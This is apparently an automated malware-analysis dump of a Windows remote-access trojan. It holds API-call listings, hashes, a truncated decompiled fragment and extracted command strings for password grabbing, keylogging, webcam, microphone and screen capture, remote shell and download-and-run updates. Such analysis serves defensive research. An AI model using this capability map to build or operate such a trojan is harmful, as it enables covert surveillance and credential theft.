                                          • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(00000000,00000000), ref: 0040A796
                                          • ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(?,ping), ref: 0040A7AB
                                          • GetTickCount.KERNEL32 ref: 0040A7BD
                                            • Part of subcall function 0040ED35: _itoa.MSVCRT ref: 0040ED53
                                            • Part of subcall function 0040ED35: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,0040A186,?,00000000), ref: 0040ED67
                                            • Part of subcall function 0040E898: GetLastInputInfo.USER32(00000000), ref: 0040E8A8
                                            • Part of subcall function 0040E898: GetTickCount.KERNEL32 ref: 0040E8AE
                                            • Part of subcall function 0040E85D: GetForegroundWindow.USER32 ref: 0040E866
                                            • Part of subcall function 0040E85D: GetWindowTextW.USER32 ref: 0040E879
                                            • Part of subcall function 0040E85D: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(?,?), ref: 0040E88D
                                            • Part of subcall function 0040EDD3: ?length@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ.MSVCP60(?,?,00415940,00415268,00415268,00000000,00415268,00000000), ref: 0040EDE3
                                            • Part of subcall function 0040EDD3: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(004118A0,00000000,?,00415940,00415268,00415268,00000000,00415268,00000000), ref: 0040EDF4
                                            • Part of subcall function 0040EDD3: ?length@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ.MSVCP60(?,00415940,00415268,00415268,00000000,00415268,00000000), ref: 0040EDFD
                                            • Part of subcall function 0040EDD3: ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,00415940,00415268,00415268,00000000,00415268,00000000), ref: 0040EE0A
                                            • Part of subcall function 0040EDD3: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,00415940,00415268,00415268,00000000,00415268,00000000), ref: 0040EE15
                                            • Part of subcall function 0040EDD3: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(hRA,?,00415940,00415268,00415268,00000000,00415268,00000000), ref: 0040EE34
                                            • Part of subcall function 0040EDD3: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,00415940,00415268,00415268,00000000,00415268,00000000), ref: 0040EE3D
                                          • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,pong,00415268,00000000,00000001,00415268,00000000,00000000,?,?,?,00000000), ref: 0040A81C
                                          • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,00000001,00415268,00000000,00000000,?,?,?,00000000), ref: 0040A82C
                                          • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,00415268,00000000,00000000,?,?,?,00000000), ref: 0040A83C
                                          • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,00415268,00000000,00000000,?,?,?,00000000), ref: 0040A84C
                                          • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,00415268,00000000,00000000), ref: 0040A85C
                                          • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00415268), ref: 0040A869
                                          • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040A876
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040A897
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040A8A0
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040A8AC
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040A8B8
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040A8C4
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040A8D0
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040A8DC
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040A8E8
                                          • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040A8F4
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040A8FD
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040A906
                                          • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000002), ref: 0040A918
                                          • atoi.MSVCRT ref: 0040A925
                                          • ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(00000000,00000001,00410844), ref: 0040A965
                                          • ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(?,filemgr), ref: 0040A9A2
                                          • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(00000000), ref: 0040A9BA
                                          • ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(?,close), ref: 0040B63C
                                          • exit.MSVCRT ref: 0040B646
                                          • ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(?,uninstall), ref: 0040B655
                                          • Sleep.KERNEL32(00000064), ref: 0040B668
                                          • ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(?,updatefromurl), ref: 0040B683
                                          • Sleep.KERNEL32(00000064), ref: 0040B69A
                                          • getenv.MSVCRT ref: 0040B6BB
                                          • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00000000), ref: 0040B6C6
                                          • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000), ref: 0040B6D1
                                          • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040B6DE
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040B6E9
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040B6F2
                                          • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,00000000), ref: 0040B6FF
                                          • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000001,00000000), ref: 0040B712
                                          • URLDownloadToFileA.URLMON(00000000,00000000), ref: 0040B71A
                                          • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 0040B72C
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040B73D
                                            • Part of subcall function 004026F2: GetLocalTime.KERNEL32(?,758EFF80,00415A30,?,?,?,?,?,?,?,?,?,?,?,0040A946,?), ref: 0040271B
                                            • Part of subcall function 004026F2: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(%02i:%02i:%02i:%03i [KeepAlive] ,?,Timeout changed to %i,?,?,0040A946,?,?), ref: 00402747
                                            • Part of subcall function 004026F2: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,0040A946,?), ref: 00402752
                                            • Part of subcall function 004026F2: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0040A946,?), ref: 0040275C
                                            • Part of subcall function 004026F2: printf.MSVCRT ref: 00402763
                                            • Part of subcall function 004026F2: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040276F
                                            • Part of subcall function 004026F2: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00402778
                                          • ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(?,updatefromlocal), ref: 0040B751
                                          • Sleep.KERNEL32(00000064), ref: 0040B768
                                          • getenv.MSVCRT ref: 0040B789
                                          • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00000000), ref: 0040B794
                                          • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000), ref: 0040B79F
                                          • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040B7AC
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040B7B7
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040B7C0
                                          • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000032,00000001), ref: 0040B7CD
                                          • ??0?$basic_ofstream@DU?$char_traits@D@std@@@std@@QAE@PBDH@Z.MSVCP60(00000000), ref: 0040B7DA
                                          • ?is_open@?$basic_ofstream@DU?$char_traits@D@std@@@std@@QBE_NXZ.MSVCP60 ref: 0040B7E6
                                          • ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00000002), ref: 0040B7FC
                                          • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000002,00000000), ref: 0040B80F
                                          • ?write@?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV12@PBDH@Z.MSVCP60(00000000), ref: 0040B81C
                                          • ?close@?$basic_ofstream@DU?$char_traits@D@std@@@std@@QAEXXZ.MSVCP60 ref: 0040B828
                                          • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 0040B837
                                          • ??_D?$basic_ofstream@DU?$char_traits@D@std@@@std@@QAEXXZ.MSVCP60 ref: 0040B84B
                                          • ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(?,msgbox), ref: 0040B862
                                          • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000003), ref: 0040B876
                                          • atoi.MSVCRT ref: 0040B87D
                                          • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000002,-00010000), ref: 0040B892
                                          • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000001,00000000), ref: 0040B8A5
                                          • MessageBoxA.USER32 ref: 0040B8AE
                                          • ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(?,keyinput), ref: 0040B8C2
                                          • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000001), ref: 0040B8D6
                                          • atoi.MSVCRT ref: 0040B8DD
                                            • Part of subcall function 0040E46D: SendInput.USER32(00000001,?,0000001C,00415268), ref: 0040E495
                                            • Part of subcall function 0040E46D: SendInput.USER32(00000001,00000001,0000001C), ref: 0040E4A6
                                          • ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(?,mclick), ref: 0040B8F5
                                          • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000003), ref: 0040B909
                                          • atoi.MSVCRT ref: 0040B910
                                          • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000002,00000000), ref: 0040B920
                                          • atoi.MSVCRT ref: 0040B927
                                          • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000001,00000000), ref: 0040B937
                                          • atoi.MSVCRT ref: 0040B93E
                                          • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040A880
                                            • Part of subcall function 00402198: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,00415A30,00415940,?,0040A446), ref: 004021A7
                                            • Part of subcall function 00402198: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004021BA
                                          • ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(?,keepaliveoff), ref: 0040A988
                                          • ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(?,deletefile), ref: 0040B60D
                                          • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000001), ref: 0040B621
                                          • DeleteFileA.KERNEL32(00000000), ref: 0040B628
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040BC78
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040BC8C
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000011.00000002.299950040.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Yara matches
                                          Similarity
                                          • API ID: V?$allocator@$U?$char_traits@$D@std@@$D@2@@std@@$??1?$basic_string@$D@2@@0@V?$basic_string@$??0?$basic_string@?c_str@?$basic_string@$Hstd@@$??8std@@$V01@@$V10@0@$D@1@@atoi$?length@?$basic_string@D@std@@@std@@G@2@@std@@G@std@@$InputSleepV10@V12@$CountFileSendTickWindowgetenv$??0?$basic_ofstream@??4?$basic_string@?close@?$basic_ofstream@?find@?$basic_string@?is_open@?$basic_ofstream@?size@?$basic_string@?substr@?$basic_string@?write@?$basic_ostream@CloseD?$basic_ofstream@DeleteDownloadEventForegroundG@1@@HandleInfoLastLocalMessageTextTimeV01@V10@@_itoaexitprintf
                                          • String ID: AppData$OSpower$PowrProf.dll$SetSuspendState$autogetofflinelogs$clearlogins$clipboarddata$close$closeprocfromwindow$closewindow$cmdoutput$consolecmd$deletefile$deletekeylog$dlldata$dllurl$downloadfromlocaltofile$downloadfromurltofile$dwnldscr$emptyclipboard$execcom$filemgr$freecamcap$freescrcap$getcamlib$getclipboard$getofflinelogs$getproclist$getscrslist$getwindows$initcamcap$initfun$initializescrcap$initklfrm$initregedit$initremscript$keepaliveoff$keyinput$maxwindow$mclick$miccapture$msgbox$open$openaddress$ping$pong$prockill$proclist$pwgrab$restorewindow$scrcap$screenshotdata$scrslist$setclipboard$startonlinekl$stopmiccapture$stoponlinekl$uninstall$updatefromlocal$updatefromurl
                                          • API String ID: 4235549877-3954364873
                                          • Opcode ID: d40044fdd170cee578c73f860a99ad2946619398251b1fdaf39685dc429f8304
                                          • Instruction ID: 15dfb3fcceeeb11733fb975214f02c8d6630f90493aa5ef66b82fcebf2304a7a
                                          • Opcode Fuzzy Hash: d40044fdd170cee578c73f860a99ad2946619398251b1fdaf39685dc429f8304
                                          • Instruction Fuzzy Hash: DFC26271940219ABDF04A7A1EC5AEEE7738EF55304F10447AF502B20E1DFB89A89CB5D
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00410858,?,?,758EFF80,00415268,7313CB00), ref: 0040BEBC
                                          • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 0040BECB
                                            • Part of subcall function 0040EFB5: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00407491,?), ref: 0040EFC4
                                            • Part of subcall function 0040EFB5: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00407491,?), ref: 0040EFDB
                                            • Part of subcall function 0040EFB5: ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIABV12@I@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00407491), ref: 0040EFF1
                                            • Part of subcall function 0040EFB5: ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000000,00000000), ref: 0040F00F
                                            • Part of subcall function 0040EFB5: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00407491,?), ref: 0040F019
                                            • Part of subcall function 0040EFB5: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00407491,?), ref: 0040F022
                                            • Part of subcall function 0040EFB5: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00407491,?), ref: 0040F037
                                            • Part of subcall function 0040EFB5: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00407491,?), ref: 0040F044
                                            • Part of subcall function 0040EFB5: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00407491,?), ref: 0040F096
                                            • Part of subcall function 0040EFB5: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00407491,?), ref: 0040F09F
                                            • Part of subcall function 0040EFB5: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00407491,?), ref: 0040F0A8
                                          • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?), ref: 0040BEEE
                                          • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00000000), ref: 0040BEF8
                                          • ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(?,getdrives), ref: 0040BF0D
                                          • GetLogicalDriveStringsA.KERNEL32 ref: 0040BF22
                                          • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(?,00000064,?), ref: 0040BF38
                                          • ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIPBDII@Z.MSVCP60(004116FC,00000000,00000002), ref: 0040BF49
                                          • ?resize@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEXI@Z.MSVCP60(00000001), ref: 0040BF54
                                          • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 0040BF63
                                            • Part of subcall function 004083E6: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,7313CB00), ref: 004083F4
                                            • Part of subcall function 004083E6: ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0040BF72), ref: 004083FD
                                            • Part of subcall function 004083E6: GetDriveTypeA.KERNEL32(00000000,?,0000000A), ref: 00408415
                                            • Part of subcall function 004083E6: _itoa.MSVCRT ref: 0040841C
                                            • Part of subcall function 004083E6: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(?,?,0000002D), ref: 00408432
                                            • Part of subcall function 004083E6: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 0040843A
                                            • Part of subcall function 004083E6: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,?,00000000), ref: 00408449
                                            • Part of subcall function 004083E6: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@D@Z.MSVCP60(?,00000000), ref: 00408456
                                            • Part of subcall function 004083E6: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 00408462
                                            • Part of subcall function 004083E6: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040846B
                                            • Part of subcall function 004083E6: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00408474
                                            • Part of subcall function 004083E6: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040847D
                                            • Part of subcall function 004083E6: lstrlenA.KERNEL32(00000000), ref: 00408484
                                            • Part of subcall function 004083E6: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 0040849A
                                            • Part of subcall function 004083E6: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0040BF72), ref: 004084A3
                                            • Part of subcall function 004083E6: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0040BF72), ref: 004084AC
                                          • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,driveslist,00415268,?,00415268,00000000), ref: 0040BF8D
                                          • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,00415268,00000000), ref: 0040BF9A
                                          • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,00415268,00000000), ref: 0040BFA7
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,00415268,00000000), ref: 0040BFC6
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,00415268,00000000), ref: 0040BFCF
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,00415268,00000000), ref: 0040BFDB
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,00415268,00000000), ref: 0040BFE4
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,00415268,00000000), ref: 0040BFED
                                          • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,00415268,00000000), ref: 0040BFB1
                                            • Part of subcall function 00402198: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,00415A30,00415940,?,0040A446), ref: 004021A7
                                            • Part of subcall function 00402198: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004021BA
                                          • ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(?,listfiles), ref: 0040C001
                                          • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(00000000), ref: 0040C031
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040C623
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040C634
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000011.00000002.299950040.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Yara matches
                                          Similarity
                                          • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$??1?$basic_string@$??0?$basic_string@$D@2@@0@V?$basic_string@$V01@@$D@1@@Hstd@@$?length@?$basic_string@V10@0@$??4?$basic_string@??8std@@?c_str@?$basic_string@?find@?$basic_string@DriveV01@V10@V12@$?data@?$basic_string@?resize@?$basic_string@?substr@?$basic_string@LogicalStringsTypeV10@@_itoalstrlen
                                          • String ID: Unable to rename file!$delete$download$driveslist$getdrives$listfiles$newfolder$open$open$rename$search$sendfiledata$showmsg$stopsearch$upload
                                          • API String ID: 3022309246-3399653838
                                          • Opcode ID: f69ad1251e661361170cebbda10b8b92ca4ecd91549d69f2b73608baae335c96
                                          • Instruction ID: d8c6c4d787ab652cc050522138cbe33c2e5dc8e9482fe9015d7f3b3e7ca7eb0a
                                          • Opcode Fuzzy Hash: f69ad1251e661361170cebbda10b8b92ca4ecd91549d69f2b73608baae335c96
                                          • Instruction Fuzzy Hash: 9B225C72900109ABDB04EBE1DD5E9EE7B7CEB44305F10057AF502F20D1EE795A89CBA9
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 17%
                                          			E00402C45(char** __ecx, void* __edx) {
                                          				char* _t96;
                                          				void* _t102;
                                          				void* _t116;
                                          				char* _t119;
                                          				void* _t121;
                                          				void* _t125;
                                          				void* _t127;
                                          				void* _t132;
                                          				void* _t135;
                                          				void* _t142;
                                          				void* _t153;
                                          				char _t158;
                                          				char _t165;
                                          				void* _t219;
                                          				void* _t220;
                                          				intOrPtr* _t221;
                                          				void* _t224;
                                          				void* _t228;
                                          				void* _t230;
                                          				intOrPtr _t231;
                                          				void* _t232;
                                          				void* _t237;
                                          				void* _t239;
                                          				void* _t250;
                                          
                                          				_t219 = __edx;
                                          				L0040FCDE();
                                          				_t231 = _t230 - 0x3b4;
                                          				 *((intOrPtr*)(_t228 - 0x10)) = _t231;
                                          				_t221 = __ecx;
